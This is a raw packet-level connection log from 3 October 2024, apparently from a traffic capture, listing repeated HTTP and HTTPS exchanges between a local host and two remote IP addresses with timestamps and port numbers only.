Oct 3, 2024 03:27:55.733076096 CEST	80	52925	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:55.733141899 CEST	52925	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:55.733268976 CEST	52925	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:55.738528967 CEST	80	52925	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:56.022739887 CEST	52925	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:27:56.070761919 CEST	80	52925	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:56.105324984 CEST	80	52925	104.26.12.205	192.168.2.6
Oct 3, 2024 03:27:56.105403900 CEST	52925	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:01.327543020 CEST	52926	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:01.477852106 CEST	80	52926	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:01.478065968 CEST	52926	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:01.478065968 CEST	52926	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:01.482887983 CEST	80	52926	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:01.942761898 CEST	80	52926	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:01.944117069 CEST	52927	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:01.944154024 CEST	443	52927	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:01.944217920 CEST	52927	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:01.944570065 CEST	52927	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:01.944585085 CEST	443	52927	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:02.137639999 CEST	52926	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:02.408808947 CEST	443	52927	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:02.411952019 CEST	52927	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:02.411967039 CEST	443	52927	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:02.545764923 CEST	443	52927	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:02.547403097 CEST	52927	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:02.547420979 CEST	443	52927	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:02.880316973 CEST	443	52927	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:02.880744934 CEST	443	52927	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:02.880841970 CEST	52927	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:02.881031036 CEST	52927	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:02.881347895 CEST	52926	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:02.882128000 CEST	52928	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:02.886483908 CEST	80	52926	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:02.886594057 CEST	52926	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:02.886908054 CEST	80	52928	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:02.887025118 CEST	52928	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:02.887124062 CEST	52928	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:02.891994953 CEST	80	52928	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:03.366909981 CEST	80	52928	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:03.368176937 CEST	52929	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:03.368228912 CEST	443	52929	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:03.368355989 CEST	52929	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:03.368700981 CEST	52929	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:03.368736029 CEST	443	52929	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:03.435784101 CEST	52928	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:03.828509092 CEST	443	52929	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:03.830734015 CEST	52929	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:03.830825090 CEST	443	52929	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:03.964687109 CEST	443	52929	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:03.965090990 CEST	52929	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:03.965157986 CEST	443	52929	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:04.255191088 CEST	443	52929	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:04.255254984 CEST	443	52929	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:04.255316019 CEST	52929	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:04.255810022 CEST	52929	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:04.257152081 CEST	52930	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:04.257183075 CEST	443	52930	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:04.257230043 CEST	52930	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:04.257672071 CEST	52930	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:04.257688999 CEST	443	52930	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:04.719866991 CEST	443	52930	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:04.723634005 CEST	52930	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:04.723671913 CEST	443	52930	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:04.859050035 CEST	443	52930	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:04.861212015 CEST	52930	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:04.861243010 CEST	443	52930	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:05.096831083 CEST	52930	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:05.096927881 CEST	443	52930	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:05.097146034 CEST	443	52930	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:05.097347021 CEST	52930	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:05.097347975 CEST	52930	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:24.462464094 CEST	52928	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:24.463538885 CEST	52932	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:24.467545986 CEST	80	52928	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:24.467614889 CEST	52928	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:24.468379974 CEST	80	52932	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:24.469280005 CEST	52932	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:24.469759941 CEST	52932	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:24.474776983 CEST	80	52932	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:24.945278883 CEST	80	52932	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:24.948673964 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:24.948776960 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:24.949362993 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:24.949743986 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:24.949784040 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:24.997014046 CEST	52932	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:25.414702892 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:25.414910078 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:25.417342901 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:25.417376041 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:25.417618036 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:25.419286966 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:25.463423967 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:25.550184011 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:25.550612926 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:25.550682068 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:25.976861000 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:25.976938009 CEST	443	52933	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:25.977061033 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:25.977421045 CEST	52933	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:25.977762938 CEST	52932	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:25.978516102 CEST	52934	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:25.982887030 CEST	80	52932	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:25.982999086 CEST	52932	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:25.983444929 CEST	80	52934	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:25.983570099 CEST	52934	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:25.983685970 CEST	52934	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:25.988643885 CEST	80	52934	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:26.439889908 CEST	80	52934	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:26.445641041 CEST	52935	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:26.445710897 CEST	443	52935	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:26.446173906 CEST	52935	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:26.446173906 CEST	52935	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:26.446227074 CEST	443	52935	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:26.590789080 CEST	52934	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:26.920610905 CEST	443	52935	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:26.923701048 CEST	52935	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:26.923716068 CEST	443	52935	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.036358118 CEST	443	52935	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.036768913 CEST	52935	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:27.036811113 CEST	443	52935	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.338664055 CEST	443	52935	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.338757038 CEST	443	52935	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.338896990 CEST	52935	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:27.339365005 CEST	52935	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:27.340272903 CEST	52936	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:27.340298891 CEST	443	52936	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.340364933 CEST	52936	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:27.340714931 CEST	52936	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:27.340723038 CEST	443	52936	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.804296017 CEST	443	52936	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.856235981 CEST	52936	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:27.856251001 CEST	443	52936	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.952579975 CEST	443	52936	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:27.958970070 CEST	52936	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:27.958977938 CEST	443	52936	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:28.241175890 CEST	443	52936	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:28.241266012 CEST	443	52936	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:28.241328955 CEST	52936	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:28.241839886 CEST	52936	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:28.531486988 CEST	52934	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:28.532936096 CEST	52937	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:28.537710905 CEST	80	52934	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:28.537795067 CEST	52934	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:28.539134979 CEST	80	52937	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:28.539211035 CEST	52937	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:28.540184975 CEST	52937	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:28.545108080 CEST	80	52937	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:29.004704952 CEST	80	52937	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:29.006062984 CEST	52938	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:29.006094933 CEST	443	52938	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:29.006153107 CEST	52938	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:29.006481886 CEST	52938	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:29.006495953 CEST	443	52938	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:29.090754986 CEST	52937	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:29.464555979 CEST	443	52938	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:29.470114946 CEST	52938	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:29.470134020 CEST	443	52938	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:29.596460104 CEST	443	52938	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:29.598345995 CEST	52938	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:29.598367929 CEST	443	52938	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:29.947434902 CEST	443	52938	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:29.947520971 CEST	443	52938	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:29.947664022 CEST	52938	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:29.948133945 CEST	52938	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:29.948323011 CEST	52937	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:29.949103117 CEST	52939	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:29.953464985 CEST	80	52937	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:29.953624010 CEST	52937	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:29.954021931 CEST	80	52939	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:29.954101086 CEST	52939	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:29.955442905 CEST	52939	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:29.960270882 CEST	80	52939	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:30.578412056 CEST	80	52939	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:30.614098072 CEST	52940	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:30.614137888 CEST	443	52940	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:30.614206076 CEST	52940	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:30.614845037 CEST	52940	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:30.614860058 CEST	443	52940	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:30.646933079 CEST	80	52939	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:30.647856951 CEST	52939	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:31.076399088 CEST	443	52940	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:31.078319073 CEST	52940	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:31.078349113 CEST	443	52940	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:31.189789057 CEST	443	52940	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:31.190144062 CEST	52940	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:31.190155029 CEST	443	52940	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:31.528069019 CEST	443	52940	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:31.528156996 CEST	443	52940	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:31.528347015 CEST	52940	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:31.528723001 CEST	52940	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:31.529599905 CEST	52941	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:31.529649973 CEST	443	52941	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:31.529840946 CEST	52941	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:31.530081034 CEST	52941	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:31.530097008 CEST	443	52941	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:31.998495102 CEST	443	52941	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:32.000721931 CEST	52941	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:32.000761032 CEST	443	52941	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:32.112736940 CEST	443	52941	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:32.113132000 CEST	52941	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:32.113157034 CEST	443	52941	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:32.422931910 CEST	443	52941	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:32.423019886 CEST	443	52941	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:32.423091888 CEST	52941	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:32.423557043 CEST	52941	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:34.297059059 CEST	52939	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:34.298036098 CEST	52942	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:34.302103043 CEST	80	52939	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:34.302225113 CEST	52939	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:34.302910089 CEST	80	52942	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:34.303016901 CEST	52942	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:34.303497076 CEST	52942	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:34.308656931 CEST	80	52942	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:34.764616013 CEST	80	52942	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:34.765831947 CEST	52943	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:34.765873909 CEST	443	52943	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:34.765937090 CEST	52943	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:34.766297102 CEST	52943	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:34.766319036 CEST	443	52943	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:34.834965944 CEST	52942	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:35.222897053 CEST	443	52943	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:35.224960089 CEST	52943	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:35.224972963 CEST	443	52943	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:35.345360994 CEST	443	52943	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:35.349044085 CEST	52943	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:35.349087000 CEST	443	52943	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:36.661830902 CEST	443	52943	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:36.661907911 CEST	443	52943	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:36.661963940 CEST	52943	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:36.662673950 CEST	52943	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:36.662728071 CEST	52942	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:36.663503885 CEST	52944	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:36.885472059 CEST	80	52944	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:36.885524035 CEST	80	52942	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:36.885566950 CEST	52944	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:36.885590076 CEST	52942	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:36.885751009 CEST	52944	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:36.890564919 CEST	80	52944	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:37.350682020 CEST	80	52944	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:37.352153063 CEST	52945	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:37.352194071 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:37.352247953 CEST	52945	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:37.352684975 CEST	52945	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:37.352701902 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:37.434514999 CEST	52944	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:37.807862997 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:37.811203003 CEST	52945	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:37.811223030 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.138690948 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.141236067 CEST	52945	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:38.141248941 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.432106018 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.432187080 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.439399004 CEST	443	52945	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.439573050 CEST	52945	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:38.439573050 CEST	52945	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:38.439573050 CEST	52945	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:38.443417072 CEST	52946	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:38.443451881 CEST	443	52946	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.444026947 CEST	52946	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:38.444986105 CEST	52946	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:38.444994926 CEST	443	52946	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.901731968 CEST	443	52946	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:38.903537989 CEST	52946	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:38.903558016 CEST	443	52946	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:39.017292023 CEST	443	52946	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:39.017560959 CEST	52946	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:39.017579079 CEST	443	52946	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:39.320729017 CEST	443	52946	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:39.320808887 CEST	443	52946	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:39.320858002 CEST	52946	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:39.321249962 CEST	52946	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:42.028964043 CEST	52944	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:42.031414986 CEST	52948	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:42.034003973 CEST	80	52944	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:42.034779072 CEST	52944	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:42.036197901 CEST	80	52948	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:42.036365986 CEST	52948	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:42.036510944 CEST	52948	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:42.041562080 CEST	80	52948	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:42.510267973 CEST	80	52948	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:42.511606932 CEST	52949	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:42.511710882 CEST	443	52949	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:42.511792898 CEST	52949	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:42.512140989 CEST	52949	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:42.512173891 CEST	443	52949	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:42.604351997 CEST	52948	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:42.972275019 CEST	443	52949	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:42.974591970 CEST	52949	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:42.974623919 CEST	443	52949	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:43.096184015 CEST	443	52949	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:43.096611023 CEST	52949	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:43.096628904 CEST	443	52949	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:43.429899931 CEST	443	52949	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:43.429990053 CEST	443	52949	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:43.430031061 CEST	52949	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:43.430530071 CEST	52949	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:43.430891991 CEST	52948	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:43.431746960 CEST	52950	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:43.435889959 CEST	80	52948	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:43.435973883 CEST	52948	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:43.436508894 CEST	80	52950	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:43.436580896 CEST	52950	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:43.450025082 CEST	52950	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:43.454818964 CEST	80	52950	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:43.895359039 CEST	80	52950	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:43.896650076 CEST	52951	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:43.896699905 CEST	443	52951	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:43.896872044 CEST	52951	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:43.897191048 CEST	52951	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:43.897214890 CEST	443	52951	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:43.997047901 CEST	52950	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:44.352286100 CEST	443	52951	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:44.354070902 CEST	52951	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:44.354104042 CEST	443	52951	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:44.470568895 CEST	443	52951	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:44.470941067 CEST	52951	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:44.470969915 CEST	443	52951	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:44.757016897 CEST	443	52951	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:44.757102966 CEST	443	52951	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:44.757157087 CEST	52951	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:44.757765055 CEST	52951	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:44.759033918 CEST	52952	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:44.759089947 CEST	443	52952	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:44.759150028 CEST	52952	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:44.759536982 CEST	52952	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:44.759557962 CEST	443	52952	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:45.216857910 CEST	443	52952	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:45.218369007 CEST	52952	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:45.218399048 CEST	443	52952	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:45.352624893 CEST	443	52952	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:45.352844954 CEST	52952	443	192.168.2.6	104.21.54.163
